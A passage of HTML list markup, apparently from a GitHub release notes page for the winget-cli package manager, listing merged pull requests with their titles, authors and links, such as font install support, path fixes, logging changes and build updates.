<li>Fix portable path removal on upgrade by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3466370013" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5756" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5756/hovercard" href="https://github.com/microsoft/winget-cli/pull/5756">#5756</a></li>
<li>Minor update to release notes for v1.12 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3470589894" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5761" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5761/hovercard" href="https://github.com/microsoft/winget-cli/pull/5761">#5761</a></li>
<li>Font Install, Uninstall, additional Font List by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3187280381" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5566" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5566/hovercard" href="https://github.com/microsoft/winget-cli/pull/5566">#5566</a></li>
<li>Fix install source and final progress by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3474726946" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5764" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5764/hovercard" href="https://github.com/microsoft/winget-cli/pull/5764">#5764</a></li>
<li>Use winrt for time conversion by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3474607043" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5763" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5763/hovercard" href="https://github.com/microsoft/winget-cli/pull/5763">#5763</a></li>
<li>Change label_as_duplicate to false in workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3488439814" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5773" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5773/hovercard" href="https://github.com/microsoft/winget-cli/pull/5773">#5773</a></li>
<li>Remove openssl from sfsclient cgmanifest by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3489513239" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5775" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5775/hovercard" href="https://github.com/microsoft/winget-cli/pull/5775">#5775</a></li>
<li>Add admin check to uninstall of machine font by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3493108538" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5779" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5779/hovercard" href="https://github.com/microsoft/winget-cli/pull/5779">#5779</a></li>
<li>Add Font source group policy support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3302306142" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5646" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5646/hovercard" href="https://github.com/microsoft/winget-cli/pull/5646">#5646</a></li>
<li>Improve window thread termination by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3497595140" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5781" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5781/hovercard" href="https://github.com/microsoft/winget-cli/pull/5781">#5781</a></li>
<li>Fix portable installer issues when installing to non ascii path by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yao-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yao-msft">@yao-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3500476031" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5788" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5788/hovercard" href="https://github.com/microsoft/winget-cli/pull/5788">#5788</a></li>
<li>Remove experimental from Font Install, Uninstall, and source by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3500835567" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5791" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5791/hovercard" href="https://github.com/microsoft/winget-cli/pull/5791">#5791</a></li>
<li>Update NOTICE by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3511592613" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5801" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5801/hovercard" href="https://github.com/microsoft/winget-cli/pull/5801">#5801</a></li>
<li>Update localized strings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3514675035" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5805" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5805/hovercard" href="https://github.com/microsoft/winget-cli/pull/5805">#5805</a></li>
<li>Bump version to 1.28 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3500474102" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5787" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5787/hovercard" href="https://github.com/microsoft/winget-cli/pull/5787">#5787</a></li>
<li>Move to latest 7.4 PS SDK by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3519731252" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5811" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5811/hovercard" href="https://github.com/microsoft/winget-cli/pull/5811">#5811</a></li>
<li>Enable MultiProcessorCompilation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3512401468" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5804" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5804/hovercard" href="https://github.com/microsoft/winget-cli/pull/5804">#5804</a></li>
<li>Remove mention of WinGet Insider program from the README by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3558459633" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5832" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5832/hovercard" href="https://github.com/microsoft/winget-cli/pull/5832">#5832</a></li>
<li>Ignore ReleaseStatic outputs and clean intermediates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3572615072" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5848" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5848/hovercard" href="https://github.com/microsoft/winget-cli/pull/5848">#5848</a></li>
<li>Make Repair-WGPM a COM-aware cmdlet and rework version retrieval by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3568289044" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5842" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5842/hovercard" href="https://github.com/microsoft/winget-cli/pull/5842">#5842</a></li>
<li>Unregister signal handler by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3593025660" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5861" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5861/hovercard" href="https://github.com/microsoft/winget-cli/pull/5861">#5861</a></li>
<li>Support associating export units with packages in subdirectories of install location by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3588654688" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5859" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5859/hovercard" href="https://github.com/microsoft/winget-cli/pull/5859">#5859</a></li>
<li>Send host geo to sandbox by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3617875168" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5873" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5873/hovercard" href="https://github.com/microsoft/winget-cli/pull/5873">#5873</a></li>
<li>Update C++ nuget package references using new scripts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3623390985" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5877" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5877/hovercard" href="https://github.com/microsoft/winget-cli/pull/5877">#5877</a></li>
<li>Update platform toolset by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3627539923" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5882" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5882/hovercard" href="https://github.com/microsoft/winget-cli/pull/5882">#5882</a></li>
<li>Extract event log for potential crash info by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3518633143" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5807" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5807/hovercard" href="https://github.com/microsoft/winget-cli/pull/5807">#5807</a></li>
<li>Update CODEOWNERS to include winget-developers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3649373914" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5891" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5891/hovercard" href="https://github.com/microsoft/winget-cli/pull/5891">#5891</a></li>
<li>Fixes for VS2026 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3665007222" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5896" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5896/hovercard" href="https://github.com/microsoft/winget-cli/pull/5896">#5896</a></li>
<li>Additional logging limitations and control by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3639765799" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5888" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5888/hovercard" href="https://github.com/microsoft/winget-cli/pull/5888">#5888</a></li>
<li>Use hybrid CRT linkage instead of full static by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3713123433" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5913" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5913/hovercard" href="https://github.com/microsoft/winget-cli/pull/5913">#5913</a></li>
<li>Enable source reference to get thread globals for off-thread logging by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3496366336" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5780" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5780/hovercard" href="https://github.com/microsoft/winget-cli/pull/5780">#5780</a></li>
<li>Fix JSON, missing closing brace by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/doterik/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/doterik">@doterik</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3725749076" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5924" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5924/hovercard" href="https://github.com/microsoft/winget-cli/pull/5924">#5924</a></li>
<li>Test host for in-proc COM module validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3700306254" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5910" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5910/hovercard" href="https://github.com/microsoft/winget-cli/pull/5910">#5910</a></li>
<li>Add sleep to allow background threads to quiesce by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3736500167" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5933" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5933/hovercard" href="https://github.com/microsoft/winget-cli/pull/5933">#5933</a></li>
<li>Allow suppressing configuration output on test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3503762781" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5794" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5794/hovercard" href="https://github.com/microsoft/winget-cli/pull/5794">#5794</a></li>
<li>Enable Explicit toggling for sources (i.e. Enable/Disable) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3682063243" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5904" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5904/hovercard" href="https://github.com/microsoft/winget-cli/pull/5904">#5904</a></li>
<li>Fix fuzz build by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3736419630" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5932" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5932/hovercard" href="https://github.com/microsoft/winget-cli/pull/5932">#5932</a></li>
<li>Normalize directory separators when adding packages to path by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3504149438" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5796" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5796/hovercard" href="https://github.com/microsoft/winget-cli/pull/5796">#5796</a></li>
<li>Add sleep to another inproc test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3740622150" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5935" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5935/hovercard" href="https://github.com/microsoft/winget-cli/pull/5935">#5935</a></li>
<li>Don't build inproc testbed for fuzzing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3745058247" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5937" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5937/hovercard" href="https://github.com/microsoft/winget-cli/pull/5937">#5937</a></li>
<li>Create schema 1.12.0 folder by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3757864843" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5944" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5944/hovercard" href="https://github.com/microsoft/winget-cli/pull/5944">#5944</a></li>
<li>Fix names of 1.12 Schemas by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3757909234" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5945" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5945/hovercard" href="https://github.com/microsoft/winget-cli/pull/5945">#5945</a></li>
<li>Fix Font feature property name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3758021326" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5946" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5946/hovercard" href="https://github.com/microsoft/winget-cli/pull/5946">#5946</a></li>
<li>Add check to ensure vcpkg triplets match across projects by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3771462095" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5950" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5950/hovercard" href="https://github.com/microsoft/winget-cli/pull/5950">#5950</a></li>
<li>Update release notes for v1.28 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3786109953" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5957" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5957/hovercard" href="https://github.com/microsoft/winget-cli/pull/5957">#5957</a></li>
<li>Details output option for <code>list</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3748529639" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5939" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5939/hovercard" href="https://github.com/microsoft/winget-cli/pull/5939">#5939</a></li>
<li>PowerShell Repair enhancements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3395519393" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5711" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5711/hovercard" href="https://github.com/microsoft/winget-cli/pull/5711">#5711</a></li>
<li>Allow inproc callers to disable termination signal handlers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3789855368" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5958" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5958/hovercard" href="https://github.com/microsoft/winget-cli/pull/5958">#5958</a></li>
<li>Add manifest version to WinGetUtilInterop by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/msftrubengu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/msftrubengu">@msftrubengu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3794767294" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5964" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5964/hovercard" href="https://github.com/microsoft/winget-cli/pull/5964">#5964</a></li>
<li>Fixes for updating winget from winget by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3806959508" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5972" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5972/hovercard" href="https://github.com/microsoft/winget-cli/pull/5972">#5972</a></li>
<li>Diagnostics and fix for pipeline test failures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3810295053" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5975" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5975/hovercard" href="https://github.com/microsoft/winget-cli/pull/5975">#5975</a></li>
<li>Escape caller in user agent header by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3840346247" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5998" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5998/hovercard" href="https://github.com/microsoft/winget-cli/pull/5998">#5998</a></li>
<li>Add DSC resource list to manifest by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3839410468" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5997" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5997/hovercard" href="https://github.com/microsoft/winget-cli/pull/5997">#5997</a></li>
